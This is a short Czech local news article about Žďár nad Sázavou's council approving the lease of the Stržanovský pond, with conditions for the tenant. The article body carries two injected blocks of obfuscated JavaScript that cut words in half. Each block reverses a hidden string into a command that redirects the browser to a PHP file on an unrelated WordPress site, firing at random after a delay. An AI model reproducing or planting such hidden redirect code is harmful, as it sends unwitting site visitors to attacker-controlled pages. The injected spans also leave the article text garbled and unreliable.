Žďár nad Sázavou, zdar nad sazavou, aktuality, rybník, pronájem
Rainbow page separator

Žďárští nabízejí k pronájmu rybník

Neděle, 27. ledna 2013

Žďár nad Sázavou / Záměr pronájmu Stržanovského rybníka včetně pozemku schválili radní Žďáru nad Sázavou. A ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to za účelem chovu a odlovu ryb, přičemž si vymezili dodržení veškerých podmínek pronájmu.

První z nich je vysazení vhodného druhu ryb, dalším pak odstranění křovin a stromů v bezprostřední blízkosti vodní nádrže, aby nedošlo k porušení koruny hráze.

Zástupci města budou rovněž po nájemci vodní plochy požadovat bezplatné a pravidelné sečení trávy v okolí rybníka včetně jejího odstraňování, pořádání rybářských soutěží pro děti i pro dospělé a převzetí odpovědnosti za technicko-bezpečnostní dozor, manipulaci s vodou a také zajištění veškerých povolení k provozování rybníka.

A pro["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože Stržanovský rybník je v zimě mládeží užíván jako kluziště, nový nájemce je povinen zajistit dětem odpovídající náhradní ledovou plochu na tamním hřišti.